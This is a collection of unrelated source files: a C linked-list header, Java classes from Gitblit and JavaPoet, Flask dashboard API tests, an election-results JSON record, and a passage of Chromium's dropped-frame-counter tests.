#ifndef REDROID_LIST_HDR #define REDROID_LIST_HDR #include <stdbool.h> #include <stddef.h> typedef struct list_iterator_s list_iterator_t; typedef struct list_s list_t; /* * Function: list_iterator_create * Create an iterator for a list. * * Parameters: * list - The list to create an iterator of. * * Returns: * An iterator for the list. */ list_iterator_t *list_iterator_create(list_t *list); /* * Function: list_iterator_destroy * Destroy an iterator * * Parameters: * iterator - The iterator to destroy. */ void list_iterator_destroy(list_iterator_t *iterator); /* * Function: list_iterator_reset * Reset the iterator to the head of the list. * * Parameters: * iterator - The iterator to reset. */ void list_iterator_reset(list_iterator_t *iterator); /* * Function: list_iterator_end * Check if iterator is at end of list. * * Parameters: * iterator - The iterator to check. * * Returns: * True if iterator is at the end of the list, false otherwise. */ bool list_iterator_end(list_iterator_t *iterator); /* * Function: list_iterator_next * Advance the iterator in a forward direction. * * Parameters: * The iterator to advance. * * Returns: * The element at the iterators position on advance. */ void *list_iterator_next(list_iterator_t *iterator); /* * Function: list_iterator_prev * Advance the iterator in a reverse direction. * * Parameters: * The iterator to advance. * * Returns: * The element at the iterators position on advance. */ void *list_iterator_prev(list_iterator_t *iterator); /* * Function: list_create * Create a list * * Returns: * A list */ list_t *list_create(void); /* * Function: list_destroy * Destroy a list * * Parameters: * list - The list to destroy */ void list_destroy(list_t *list); /* * Function: list_push * Push an element onto the list's tail end. * * Parameters: * list - The list to put the element into. * element - The element to put in the list. */ void list_push(list_t *list, void *element); /* * Function: list_prepend * Push an element onto the list's head end. * * Parameters: * list - The list to put the element into. * element - The element to put in the list. */ void list_prepend(list_t *list, void *element); /* * Function: list_pop * Pop an element off the list's tail end. * * Parameters: * list - The list to pop the element off of. * * Returns: * The element. */ void *list_pop(list_t *list); /* * Function: list_shift * Pop an element off the list's head end. * * Parameters: * list - The list to pop the element off of. * * Returns: * The element. * * Remarks: * This thrashes the atcache of the list. */ void *list_shift(list_t *list); /* * Function: list_at * Get an element at a list index as if it where an array. * * Parameters: * list - The list to get the element of * index - The index (i.e number of indirections from head). * * Returns: * The element. * * Remarks: * If the list is used where only tail operations are performed, i.e * no shifting, no erasing and no sorting then the internal atcache * mechanism of the list will make this O(1) best case. In the event * where that isn't the case there may still be hope. For instance * when making calls to list_find and list_search the atcache is * thrashed and replaced to reflect the current ordering of the list * at least up to the find/search invariant. This means O(1) is still * very possible. In the event that none of this is the case a linear * search takes place from the index and it becomes cached so that * subsequent searches become O(1). The worst case complexity is still * O(n). 
*/ void *list_at(list_t *list, size_t index); /* * Function: list_find * Find an element in a list. * * Parameters: * list - The list to search in. * element - The element to search for. * * Returns: * True if the element is found, false otherwise. * * Remarks: * Will thrash atcache and overwrite contents so that it reflects * all visited nodes in the linear search up to the invariant that * breaks out of the search. * * Other uses: * Using this function with element=NULL or an element which doesn't * exist is a great way to syncronize the atcache of the list. It * will force all nodes to be visited thus filling the atcache with * all the content it needs to make subsequent calls to list_at constant. */ bool list_find(list_t *list, const void *element); /* * Function: list_search * Search the list with a user-defined invariant via predicate. * * Parameters: * list - The list to search. * predicate - The predicate used for the invariant in the search. * pass - The information to pass to the predicate's second argument. * * Returns: * The element of some node in the linear search which was concluded to * when the predicate itself returned true. * * Other uses: * This function has the same other uses as list_find. Mainly it thrashes * the atcache and syncronizes it with the list. */ void *list_search(list_t *list, bool (*predicate)(const void *, const void *), const void *pass); /* * Function: list_copy * Perform a copy of a list. * * Parameters: * list - The list to copy. * * Returns: * A copied list. */ list_t *list_copy(list_t *list); /* * Function: list_length * Get the length of a list (i.e number of elements). * * Parameters: * list - The list to get the length of. * * Returns: * The amount of elements in the list. */ size_t list_length(list_t *list); /* * Function: list_foreach * Execute a callback passing in each value in the entire list * as well as passing in an additional pointer. * * Parameters: * list - The list to execute the callback over. * pass - The additional thing to pass in for the callback to * get as its second argument. * callback - Pointer to function callback. */ #define list_foreach(LIST, PASS, CALLBACK) \ list_foreach_impl((LIST), (PASS), (void (*)(void *, void *))(CALLBACK)) void list_foreach_impl(list_t *list, void *pass, void (*callback)(void *, void *)); /* * Function: list_erase * Erase an element in a list. * * Parameters: * list - The list to erase the element from. * element - The element to erase. * * Returns: * True if the element was found and erased, false otherwise. * * Remarks: * This thrashes the atcache of the list. */ bool list_erase(list_t *list, void *element); /* * Function: list_sort * Sort a list. * * Parameters: * list - The list to store * predicate - Pointer to function predicate that returns a boolean * transitive relationship for two elements of the list. * * Remarks: * This thrashes the atcache of the list. */ void list_sort(list_t *list, bool (*predicate)(const void *, const void *)); #endif
2,209
1,640
<filename>src/main/java/com/gitblit/wicket/charting/Chart.java /* * Copyright 2011 gitblit.com. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.gitblit.wicket.charting; import java.io.Serializable; import java.util.ArrayList; import java.util.Date; import java.util.List; import java.util.TimeZone; import com.gitblit.Keys; import com.gitblit.utils.StringUtils; import com.gitblit.wicket.GitBlitWebApp; import com.gitblit.wicket.GitBlitWebSession; /** * Abstract parent class for different type of chart: bar, pie & line * * @author <NAME> * */ public abstract class Chart implements Serializable { private static final long serialVersionUID = 1L; final String tagId; final String dataName; final String title; final String keyName; final String valueName; final List<ChartValue> values; final List<ChartValue> highlights; int width; int height; boolean showLegend; String dateFormat = "MMM dd"; String clickUrl = null; public Chart(String tagId, String title, String keyName, String valueName) { this.tagId = tagId; this.dataName = StringUtils.getSHA1(tagId).substring(0, 8); this.title = title; this.keyName = keyName; this.valueName = valueName; values = new ArrayList<ChartValue>(); highlights = new ArrayList<ChartValue>(); showLegend = true; } public void setWidth(int width) { this.width = width; } public void setHeight(int height) { this.height = height; } public void setShowLegend(boolean val) { this.showLegend = val; } public void addValue(String name, int value) { values.add(new ChartValue(name, value)); } public void addValue(String name, float value) { values.add(new ChartValue(name, value)); } public void addValue(String name, double value) { values.add(new ChartValue(name, (float) value)); } public void addValue(Date date, int value) { values.add(new ChartValue(String.valueOf(date.getTime()), value)); } public void addHighlight(Date date, int value) { highlights.add(new ChartValue(String.valueOf(date.getTime()), value)); } protected abstract void appendChart(StringBuilder sb); protected void line(StringBuilder sb, String line) { sb.append(line); sb.append('\n'); } protected TimeZone getTimeZone() { return GitBlitWebApp.get().settings().getBoolean(Keys.web.useClientTimezone, false) ? GitBlitWebSession.get() .getTimezone() : GitBlitWebApp.get().getTimezone(); } protected class ChartValue implements Serializable, Comparable<ChartValue> { private static final long serialVersionUID = 1L; final String name; final float value; ChartValue(String name, float value) { this.name = name; this.value = value; } @Override public int compareTo(ChartValue o) { // sorts the dataset by largest value first if (value > o.value) { return -1; } else if (value < o.value) { return 1; } return 0; } } public String getDateFormat() { return dateFormat; } public void setDateFormat(String dateFormat) { this.dateFormat = dateFormat; } public String getClickUrl() { return clickUrl; } public void setClickUrl(String clickUrl) { this.clickUrl = clickUrl; } }
1,392
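A hypothetical minimal subclass of the abstract Chart above, only to illustrate where appendChart and the accumulated values plug in; it is not one of Gitblit's real chart types.

package com.gitblit.wicket.charting;

// Hypothetical debugging chart: dumps the accumulated values as plain text
// instead of real chart markup. Kept in the same package as Chart so the
// package-private "values" list and ChartValue fields are visible.
public class DebugChart extends Chart {

  private static final long serialVersionUID = 1L;

  public DebugChart(String tagId, String title, String keyName, String valueName) {
    super(tagId, title, keyName, valueName);
  }

  @Override
  protected void appendChart(StringBuilder sb) {
    line(sb, "// " + title + " (" + keyName + " / " + valueName + ")");
    for (ChartValue value : values) {
      line(sb, value.name + " = " + value.value);
    }
  }
}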
690
package com.squareup.javapoet; import com.artemis.generator.model.type.TypeDescriptor; import java.lang.reflect.ParameterizedType; import java.lang.reflect.Type; import java.util.ArrayList; import java.util.LinkedHashMap; import java.util.List; import java.util.Map; /** * Extends JavaPoet with TypeName resolver with support for {@link TypeDescriptor}. * * @see TypeDescriptor * @author <NAME> */ public class PoetTypeNameResolver { public TypeName get(Type type) { return get(type, new LinkedHashMap<Type, TypeVariableName>()); } private TypeName get(Type type, Map<Type, TypeVariableName> map) { if (type instanceof TypeDescriptor) { return ClassName.bestGuess(type.toString()); } if (type instanceof ParameterizedType) { return getForParameterizedTypes((ParameterizedType) type, map); } return TypeName.get(type); } private ParameterizedTypeName getForParameterizedTypes(ParameterizedType type, Map<Type, TypeVariableName> map) { // like ParameterizedTypeName.get, but with TypeDescriptor support. final ClassName rawType = ClassName.get((Class<?>) type.getRawType()); final ParameterizedType ownerType = (type.getOwnerType() instanceof ParameterizedType) && !java.lang.reflect.Modifier.isStatic(((Class<?>) type.getRawType()).getModifiers()) ? (ParameterizedType) type.getOwnerType() : null; List<TypeName> typeArguments = list(type.getActualTypeArguments(), map); return (ownerType != null) ? getForParameterizedTypes(ownerType, map) .nestedClass(rawType.simpleName(), typeArguments) : new ParameterizedTypeName(null, rawType, typeArguments); } private List<TypeName> list(Type[] types, Map<Type, TypeVariableName> map) { // TypeName.list, but with TypeDescriptor support. List<TypeName> result = new ArrayList<>(types.length); for (Type type : types) { result.add(get(type, map)); } return result; } }
814
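A small usage sketch for the PoetTypeNameResolver above; the demo class and field are made up, and the expected printout assumes JavaPoet's ParameterizedTypeName formatting.

package com.squareup.javapoet;

import java.lang.reflect.Field;
import java.util.List;

// Hypothetical demo: feed a field's generic type to the resolver and print the
// resulting TypeName (expected: java.util.List<java.lang.String>).
public class PoetTypeNameResolverDemo {

  static List<String> sampleField;

  public static void main(String[] args) throws Exception {
    Field field = PoetTypeNameResolverDemo.class.getDeclaredField("sampleField");
    TypeName typeName = new PoetTypeNameResolver().get(field.getGenericType());
    System.out.println(typeName);
  }
}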
2,083
<gh_stars>1000+
# test alignment feature
keys('\\\\\\\\A')
keys('\\\\\\\\a')
25
348
<filename>docs/data/leg-t2/057/05703155.json {"nom":"Courcelles-Chaussy","circ":"3ème circonscription","dpt":"Moselle","inscrits":2317,"abs":1450,"votants":867,"blancs":7,"nuls":62,"exp":798,"res":[{"nuance":"LR","nom":"<NAME>-<NAME>","voix":438},{"nuance":"REM","nom":"<NAME>","voix":360}]}
122
630
import pytest from flask_monitoringdashboard.database import Endpoint, Request @pytest.mark.parametrize('endpoint__monitor_level', [3]) def test_overview(dashboard_user, request_1, request_2, endpoint, session): response = dashboard_user.get('dashboard/api/overview') assert response.status_code == 200 [data] = [row for row in response.json if row['id'] == endpoint.id] assert data['hits-overall'] == 2 assert data['hits-today'] == 2 assert data['hits-today-errors'] == 0 assert data['hits-week'] == 2 assert data['hits-week-errors'] == 0 assert data['last-accessed'] == endpoint.last_requested.strftime("%a, %d %b %Y %H:%M:%S GMT") assert data['median-overall'] == (request_1.duration + request_2.duration) / 2 assert data['median-today'] == (request_1.duration + request_2.duration) / 2 assert data['median-week'] == (request_1.duration + request_2.duration) / 2 assert data['monitor'] == 3 assert data['name'] == endpoint.name @pytest.mark.parametrize('request_1__group_by', ['42']) @pytest.mark.parametrize('request_2__group_by', ['something else']) @pytest.mark.usefixtures('request_1', 'request_2') def test_users(dashboard_user, endpoint, session): response = dashboard_user.get('dashboard/api/users/{0}'.format(endpoint.id)) assert response.status_code == 200 data = response.json row1, row2 = data assert row1['hits'] == 1 assert row1['user'] == '42' or 'something else' assert row2['hits'] == 1 assert row2['user'] == '42' or 'something else' @pytest.mark.parametrize('request_1__ip', ['42']) @pytest.mark.parametrize('request_2__ip', ['something else']) @pytest.mark.usefixtures('request_1', 'request_2') def test_ips(dashboard_user, endpoint, session): response = dashboard_user.get('dashboard/api/ip/{0}'.format(endpoint.id)) assert response.status_code == 200 data = response.json row1, row2 = data assert row1['hits'] == 1 assert row1['ip'] == '42' or 'something else' assert row2['hits'] == 1 assert row2['ip'] == '42' or 'something else' def test_endpoints(dashboard_user, endpoint, session): response = dashboard_user.get('dashboard/api/endpoints') assert response.status_code == 200 assert len(response.json) == session.query(Endpoint).count() [data] = [row for row in response.json if row['id'] == str(endpoint.id)] assert data['last_requested'] == str(endpoint.last_requested) assert data['monitor_level'] == str(endpoint.monitor_level) assert data['name'] == endpoint.name assert data['time_added'] == str(endpoint.time_added) assert data['version_added'] == endpoint.version_added @pytest.mark.usefixtures('request_1', 'request_2') def test_endpoint_hits(dashboard_user, endpoint, session): response = dashboard_user.get('dashboard/api/endpoints_hits') assert response.status_code == 200 total_hits = sum(row['hits'] for row in response.json) assert total_hits == session.query(Request).count() [data] = [row for row in response.json if row['name'] == endpoint.name] assert data['hits'] == 2 def test_api_performance_get(dashboard_user): """GET is not allowed. It should return the overview page.""" response = dashboard_user.get('dashboard/api/api_performance') assert not response.is_json def test_api_performance_post(dashboard_user, request_1, endpoint, session): response = dashboard_user.post('dashboard/api/api_performance', json={ 'data': {'endpoints': [endpoint.name]} }) assert response.status_code == 200 [data] = response.json assert data['values'] == [request_1.duration] def test_set_rule_get(dashboard_user): """GET is not allowed. 
It should return the overview page.""" response = dashboard_user.get('dashboard/api/set_rule') assert not response.is_json @pytest.mark.parametrize('user__is_admin', [False]) def test_set_rule_post_guest_not_allowed(dashboard_user, endpoint): """Guest is redirected to the login page.""" response = dashboard_user.post('dashboard/api/set_rule', data={ 'name': endpoint.name, 'value': 3, }) assert response.status_code == 302 @pytest.mark.parametrize('endpoint__monitor_level', [1]) def test_set_rule_post(dashboard_user, endpoint, session): response = dashboard_user.post('dashboard/api/set_rule', data={ 'name': endpoint.name, 'value': 3, }) assert response.status_code == 200 assert response.data == b'OK' endpoint = session.query(Endpoint).get(endpoint.id) # reload the endpoint assert endpoint.monitor_level == 3 @pytest.mark.usefixtures('request_1') def test_endpoint_info(dashboard_user, endpoint): response = dashboard_user.get('dashboard/api/endpoint_info/{0}'.format(endpoint.id)) assert response.status_code == 200 data = response.json assert data['endpoint'] == endpoint.name assert data['monitor-level'] == endpoint.monitor_level assert data['total_hits'] == 1 assert data['rules'] == ['/'] assert data['url'] == '/' @pytest.mark.parametrize('request_1__status_code', [404]) @pytest.mark.parametrize('request_2__status_code', [200]) @pytest.mark.usefixtures('request_1', 'request_2') def test_endpoint_status_code_distribution(dashboard_user, endpoint): response = dashboard_user.get('dashboard/api/endpoint_status_code_distribution/{0}'.format(endpoint.id)) assert response.status_code == 200 data = response.json assert data['200'] == 1 / 2 assert data['404'] == 1 / 2 @pytest.mark.parametrize('request_1__status_code', [404]) @pytest.mark.parametrize('request_2__status_code', [200]) @pytest.mark.usefixtures('request_2') def test_endpoint_status_code_summary(dashboard_user, request_1, endpoint): response = dashboard_user.get('dashboard/api/endpoint_status_code_summary/{0}'.format(endpoint.id)) assert response.status_code == 200 data = response.json assert data['distribution'] == {'200': 1 / 2, '404': 1 / 2} [row] = data['error_requests'] assert row['duration'] == str(request_1.duration) assert row['endpoint_id'] == str(endpoint.id) assert row['group_by'] == str(request_1.group_by) assert row['id'] == str(request_1.id) assert row['ip'] == request_1.ip assert row['time_requested'] == str(request_1.time_requested) assert row['version_requested'] == request_1.version_requested def test_endpoint_versions_get(dashboard_user, endpoint): """GET is not allowed. It should return the overview page.""" response = dashboard_user.get('dashboard/api/endpoint_versions/{0}'.format(endpoint.id)) assert not response.is_json @pytest.mark.parametrize('request_1__version_requested', ['a']) @pytest.mark.parametrize('request_2__version_requested', ['b']) def test_endpoint_versions_post(dashboard_user, request_1, request_2, endpoint): response = dashboard_user.post( 'dashboard/api/endpoint_versions/{0}'.format(endpoint.id), json={'data': {'versions': [request_1.version_requested, request_2.version_requested]}}, ) assert response.status_code == 200 row1, row2 = response.json assert row1['version'] == request_1.version_requested assert row1['values'] == [request_1.duration] assert row2['version'] == request_2.version_requested assert row2['values'] == [request_2.duration] def test_endpoint_users_get(dashboard_user, endpoint): """GET is not allowed. 
It should return the overview page.""" response = dashboard_user.get('dashboard/api/endpoint_users/{0}'.format(endpoint.id)) assert not response.is_json @pytest.mark.parametrize('request_1__group_by', ['a']) @pytest.mark.parametrize('request_2__group_by', ['b']) def test_endpoint_users_post(dashboard_user, request_1, request_2, endpoint): response = dashboard_user.post( 'dashboard/api/endpoint_users/{0}'.format(endpoint.id), json={'data': {'users': [request_1.group_by, request_2.group_by]}}, ) assert response.status_code == 200 row1, row2 = response.json assert row1['user'] == request_1.group_by assert row1['values'] == [request_1.duration] assert row2['user'] == request_2.group_by assert row2['values'] == [request_2.duration]
2,978
14,668
<reponame>chromium/chromium // Copyright 2020 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include "cc/metrics/dropped_frame_counter.h" #include <vector> #include "base/memory/raw_ptr.h" #include "base/synchronization/lock.h" #include "base/synchronization/waitable_event.h" #include "base/test/metrics/histogram_tester.h" #include "base/time/time.h" #include "build/chromeos_buildflags.h" #include "cc/animation/animation_host.h" #include "cc/test/fake_content_layer_client.h" #include "cc/test/fake_frame_info.h" #include "cc/test/fake_picture_layer.h" #include "cc/test/layer_tree_test.h" namespace cc { namespace { using SmoothnessStrategy = DroppedFrameCounter::SmoothnessStrategy; FrameInfo CreateStubFrameInfo(bool is_dropped) { return CreateFakeFrameInfo(is_dropped ? FrameInfo::FrameFinalState::kDropped : FrameInfo::FrameFinalState::kPresentedAll); } class DroppedFrameCounterTestBase : public LayerTreeTest { public: DroppedFrameCounterTestBase() = default; ~DroppedFrameCounterTestBase() override = default; virtual void SetUpTestConfigAndExpectations() = 0; void InitializeSettings(LayerTreeSettings* settings) override { settings->commit_to_active_tree = false; } void SetupTree() override { LayerTreeTest::SetupTree(); Layer* root_layer = layer_tree_host()->root_layer(); scroll_layer_ = FakePictureLayer::Create(&client_); // Set up the layer so it always has something to paint. scroll_layer_->set_always_update_resources(true); scroll_layer_->SetBounds({3, 3}); client_.set_bounds({3, 3}); root_layer->AddChild(scroll_layer_); } void RunTest(CompositorMode mode) override { SetUpTestConfigAndExpectations(); LayerTreeTest::RunTest(mode); } void BeginTest() override { ASSERT_GT(config_.animation_frames, 0u); // Start with requesting main-frames. PostSetNeedsCommitToMainThread(); } void AfterTest() override { EXPECT_GE(total_frames_, config_.animation_frames); // It is possible to drop even more frame than what the test expects (e.g. // in slower machines, slower builds such as asan/tsan builds, etc.), since // the test does not strictly control both threads and deadlines. Therefore, // it is not possible to check for strict equality here. EXPECT_LE(expect_.min_partial, partial_); EXPECT_LE(expect_.min_dropped, dropped_); EXPECT_LE(expect_.min_dropped_smoothness, dropped_smoothness_); } // Compositor thread function overrides: void WillBeginImplFrameOnThread(LayerTreeHostImpl* host_impl, const viz::BeginFrameArgs& args, bool has_damage) override { if (TestEnded()) return; // Request a re-draw, and set a non-empty damage region (otherwise the // draw is aborted with 'no damage'). host_impl->SetNeedsRedraw(); host_impl->SetViewportDamage(gfx::Rect(0, 0, 10, 20)); if (skip_main_thread_next_frame_) { skip_main_thread_next_frame_ = false; } else { // Request update from the main-thread too. host_impl->SetNeedsCommit(); } } void DrawLayersOnThread(LayerTreeHostImpl* host_impl) override { // If the main-thread is blocked, then unblock it once the compositor thread // has already drawn a frame. base::WaitableEvent* wait = nullptr; { base::AutoLock lock(wait_lock_); wait = wait_; } if (wait) { // When the main-thread blocks during a frame, skip the main-thread for // the next frame, so that the main-thread can be in sync with the // compositor thread again. 
skip_main_thread_next_frame_ = true; wait->Signal(); } } void DidReceivePresentationTimeOnThread( LayerTreeHostImpl* host_impl, uint32_t frame_token, const gfx::PresentationFeedback& feedback) override { ++presented_frames_; if (presented_frames_ < config_.animation_frames) return; auto* dropped_frame_counter = host_impl->dropped_frame_counter(); DCHECK(dropped_frame_counter); total_frames_ = dropped_frame_counter->total_frames(); partial_ = dropped_frame_counter->total_partial(); dropped_ = dropped_frame_counter->total_dropped(); dropped_smoothness_ = dropped_frame_counter->total_smoothness_dropped(); EndTest(); } // Main-thread function overrides: void BeginMainFrame(const viz::BeginFrameArgs& args) override { if (TestEnded()) return; bool should_wait = false; if (config_.should_drop_main_every > 0) { should_wait = args.frame_id.sequence_number % config_.should_drop_main_every == 0; } if (should_wait) { base::WaitableEvent wait{base::WaitableEvent::ResetPolicy::MANUAL, base::WaitableEvent::InitialState::NOT_SIGNALED}; { base::AutoLock lock(wait_lock_); wait_ = &wait; } wait.Wait(); { base::AutoLock lock(wait_lock_); wait_ = nullptr; } } // Make some changes so that the main-thread needs to push updates to the // compositor thread (i.e. force a commit). auto const bounds = scroll_layer_->bounds(); scroll_layer_->SetBounds({bounds.width(), bounds.height() + 1}); if (config_.should_register_main_thread_animation) { animation_host()->SetAnimationCounts(1); animation_host()->SetCurrentFrameHadRaf(true); animation_host()->SetNextFrameHasPendingRaf(true); } } protected: // The test configuration options. This is set before the test starts, and // remains unchanged after that. So it is safe to read these fields from // either threads. struct TestConfig { uint32_t should_drop_main_every = 0; uint32_t animation_frames = 0; bool should_register_main_thread_animation = false; } config_; // The test expectations. This is set before the test starts, and // remains unchanged after that. So it is safe to read these fields from // either threads. struct TestExpectation { uint32_t min_partial = 0; uint32_t min_dropped = 0; uint32_t min_dropped_smoothness = 0; } expect_; private: // Set up a dummy picture layer so that every begin-main frame requires a // commit (without the dummy layer, the main-thread never has to paint, which // causes an early 'no damage' abort of the main-frame. FakeContentLayerClient client_; scoped_refptr<FakePictureLayer> scroll_layer_; // This field is used only on the compositor thread to track how many frames // have been processed. uint32_t presented_frames_ = 0; // The |wait_| event is used when the test wants to deliberately force the // main-thread to block while processing begin-main-frames. base::Lock wait_lock_; raw_ptr<base::WaitableEvent> wait_ = nullptr; // These fields are populated in the compositor thread when the desired number // of frames have been processed. These fields are subsequently compared // against the expectation after the test ends. 
uint32_t total_frames_ = 0; uint32_t partial_ = 0; uint32_t dropped_ = 0; uint32_t dropped_smoothness_ = 0; bool skip_main_thread_next_frame_ = false; }; class DroppedFrameCounterNoDropTest : public DroppedFrameCounterTestBase { public: ~DroppedFrameCounterNoDropTest() override = default; void SetUpTestConfigAndExpectations() override { config_.animation_frames = 28; config_.should_register_main_thread_animation = false; expect_.min_partial = 0; expect_.min_dropped = 0; expect_.min_dropped_smoothness = 0; } }; MULTI_THREAD_TEST_F(DroppedFrameCounterNoDropTest); class DroppedFrameCounterMainDropsNoSmoothness : public DroppedFrameCounterTestBase { public: ~DroppedFrameCounterMainDropsNoSmoothness() override = default; void SetUpTestConfigAndExpectations() override { config_.animation_frames = 28; config_.should_drop_main_every = 5; config_.should_register_main_thread_animation = false; expect_.min_partial = 5; expect_.min_dropped_smoothness = 0; } }; // TODO(crbug.com/1115376) Disabled for flakiness. // MULTI_THREAD_TEST_F(DroppedFrameCounterMainDropsNoSmoothness); class DroppedFrameCounterMainDropsSmoothnessTest : public DroppedFrameCounterTestBase { public: ~DroppedFrameCounterMainDropsSmoothnessTest() override = default; void SetUpTestConfigAndExpectations() override { config_.animation_frames = 28; config_.should_drop_main_every = 5; config_.should_register_main_thread_animation = true; expect_.min_partial = 5; expect_.min_dropped_smoothness = 5; } }; // TODO(crbug.com/1115376) Disabled for flakiness. // MULTI_THREAD_TEST_F(DroppedFrameCounterMainDropsSmoothnessTest); class DroppedFrameCounterTest : public testing::Test { public: explicit DroppedFrameCounterTest(SmoothnessStrategy smoothness_strategy = SmoothnessStrategy::kDefaultStrategy) : smoothness_strategy_(smoothness_strategy) { dropped_frame_counter_.set_total_counter(&total_frame_counter_); dropped_frame_counter_.OnFcpReceived(); } ~DroppedFrameCounterTest() override = default; // For each boolean in frame_states produces a frame void SimulateFrameSequence(std::vector<bool> frame_states, int repeat) { for (int i = 0; i < repeat; i++) { for (auto is_dropped : frame_states) { viz::BeginFrameArgs args_ = SimulateBeginFrameArgs(); dropped_frame_counter_.OnBeginFrame(args_, /*is_scroll_active=*/false); dropped_frame_counter_.OnEndFrame(args_, CreateStubFrameInfo(is_dropped)); sequence_number_++; frame_time_ += interval_; } } } // Make a sequence of frame states where the first |dropped_frames| out of // |total_frames| are dropped. std::vector<bool> MakeFrameSequence(int dropped_frames, int total_frames) { std::vector<bool> frame_states(total_frames, false); for (int i = 0; i < dropped_frames; i++) { frame_states[i] = true; } return frame_states; } std::vector<viz::BeginFrameArgs> SimulatePendingFrame(int repeat) { std::vector<viz::BeginFrameArgs> args(repeat); for (int i = 0; i < repeat; i++) { args[i] = SimulateBeginFrameArgs(); dropped_frame_counter_.OnBeginFrame(args[i], /*is_scroll_active=*/false); sequence_number_++; frame_time_ += interval_; } return args; } // Simulate a main and impl thread update on the same frame. void SimulateForkedFrame(bool main_dropped, bool impl_dropped) { viz::BeginFrameArgs args_ = SimulateBeginFrameArgs(); dropped_frame_counter_.OnBeginFrame(args_, /*is_scroll_active=*/false); dropped_frame_counter_.OnBeginFrame(args_, /*is_scroll_active=*/false); // End the 'main thread' arm of the fork. 
auto main_info = CreateStubFrameInfo(main_dropped); main_info.main_thread_response = FrameInfo::MainThreadResponse::kIncluded; dropped_frame_counter_.OnEndFrame(args_, main_info); // End the 'compositor thread' arm of the fork. auto impl_info = CreateStubFrameInfo(impl_dropped); impl_info.main_thread_response = FrameInfo::MainThreadResponse::kMissing; dropped_frame_counter_.OnEndFrame(args_, impl_info); sequence_number_++; frame_time_ += interval_; } void AdvancetimeByIntervals(int interval_count) { frame_time_ += interval_ * interval_count; } double MaxPercentDroppedFrame() { return dropped_frame_counter_.sliding_window_max_percent_dropped(); } double MaxPercentDroppedFrameAfter1Sec() { auto percent_dropped = dropped_frame_counter_.max_percent_dropped_After_1_sec(); EXPECT_TRUE(percent_dropped.has_value()); return percent_dropped.value(); } double MaxPercentDroppedFrameAfter2Sec() { auto percent_dropped = dropped_frame_counter_.max_percent_dropped_After_2_sec(); EXPECT_TRUE(percent_dropped.has_value()); return percent_dropped.value(); } double MaxPercentDroppedFrameAfter5Sec() { auto percent_dropped = dropped_frame_counter_.max_percent_dropped_After_5_sec(); EXPECT_TRUE(percent_dropped.has_value()); return percent_dropped.value(); } double PercentDroppedFrame95Percentile() { return dropped_frame_counter_.SlidingWindow95PercentilePercentDropped( smoothness_strategy_); } double PercentDroppedFrameMedian() { return dropped_frame_counter_.SlidingWindowMedianPercentDropped( smoothness_strategy_); } double PercentDroppedFrameVariance() { return dropped_frame_counter_.SlidingWindowPercentDroppedVariance( smoothness_strategy_); } const DroppedFrameCounter::SlidingWindowHistogram* GetSlidingWindowHistogram() { return dropped_frame_counter_.GetSlidingWindowHistogram( smoothness_strategy_); } double GetTotalFramesInWindow() { return base::Seconds(1) / interval_; } void SetInterval(base::TimeDelta interval) { interval_ = interval; } base::TimeTicks GetNextFrameTime() const { return frame_time_ + interval_; } // Wrap calls with EXPECT_TRUE. Logs the buckets and returns false if they // don't match (within a given epsilon). 
bool CheckSmoothnessBuckets(std::vector<double> expected_buckets) { constexpr double epsilon = 0.001; bool buckets_match = true; std::vector<double> buckets = GetSlidingWindowHistogram()->GetPercentDroppedFrameBuckets(); if (buckets.size() != expected_buckets.size()) { buckets_match = false; } else { for (size_t i = 0; i < buckets.size(); i++) { if (std::abs(buckets[i] - expected_buckets[i]) > epsilon) { buckets_match = false; break; } } } if (!buckets_match) { LOG(ERROR) << "Smoothness buckets do not match!"; LOG(ERROR) << "Expected: " << testing::PrintToString(expected_buckets); LOG(ERROR) << " Actual: " << testing::PrintToString(buckets); } return buckets_match; } public: DroppedFrameCounter dropped_frame_counter_; private: TotalFrameCounter total_frame_counter_; uint64_t sequence_number_ = 1; uint64_t source_id_ = 1; raw_ptr<const base::TickClock> tick_clock_ = base::DefaultTickClock::GetInstance(); base::TimeTicks frame_time_ = tick_clock_->NowTicks(); base::TimeDelta interval_ = base::Microseconds(16667); // 16.667 ms SmoothnessStrategy smoothness_strategy_; viz::BeginFrameArgs SimulateBeginFrameArgs() { viz::BeginFrameId current_id_(source_id_, sequence_number_); viz::BeginFrameArgs args = viz::BeginFrameArgs(); args.frame_id = current_id_; args.frame_time = frame_time_; args.interval = interval_; return args; } }; // Test class that supports parameterized tests for each of the different // SmoothnessStrategy. // // TODO(jonross): when we build the other strategies parameterize the // expectations. class SmoothnessStrategyDroppedFrameCounterTest : public DroppedFrameCounterTest, public testing::WithParamInterface<SmoothnessStrategy> { public: SmoothnessStrategyDroppedFrameCounterTest() : DroppedFrameCounterTest(GetParam()) {} ~SmoothnessStrategyDroppedFrameCounterTest() override = default; SmoothnessStrategyDroppedFrameCounterTest( const SmoothnessStrategyDroppedFrameCounterTest&) = delete; SmoothnessStrategyDroppedFrameCounterTest& operator=( const SmoothnessStrategyDroppedFrameCounterTest&) = delete; }; INSTANTIATE_TEST_SUITE_P( DefaultStrategy, SmoothnessStrategyDroppedFrameCounterTest, ::testing::Values(SmoothnessStrategy::kDefaultStrategy)); TEST_P(SmoothnessStrategyDroppedFrameCounterTest, SimplePattern1) { // 2 out of every 3 frames are dropped (In total 80 frames out of 120). SimulateFrameSequence({true, true, true, false, true, false}, 20); // The max is the following window: // 16 * <sequence> + {true, true, true, false // Which means a max of 67 dropped frames. EXPECT_EQ(std::round(MaxPercentDroppedFrame()), 67); EXPECT_EQ(PercentDroppedFrame95Percentile(), 67); // all values are in the // 65th-67th bucket, and as a result 95th percentile is also 67. EXPECT_EQ(PercentDroppedFrameMedian(), 65); EXPECT_LE(PercentDroppedFrameVariance(), 1); } TEST_P(SmoothnessStrategyDroppedFrameCounterTest, SimplePattern2) { // 1 out of every 5 frames are dropped (In total 24 frames out of 120). SimulateFrameSequence({false, false, false, false, true}, 24); double expected_percent_dropped_frame = (12 / GetTotalFramesInWindow()) * 100; EXPECT_FLOAT_EQ(MaxPercentDroppedFrame(), expected_percent_dropped_frame); EXPECT_EQ(PercentDroppedFrame95Percentile(), 20); // all values are in the // 20th bucket, and as a result 95th percentile is also 20. 
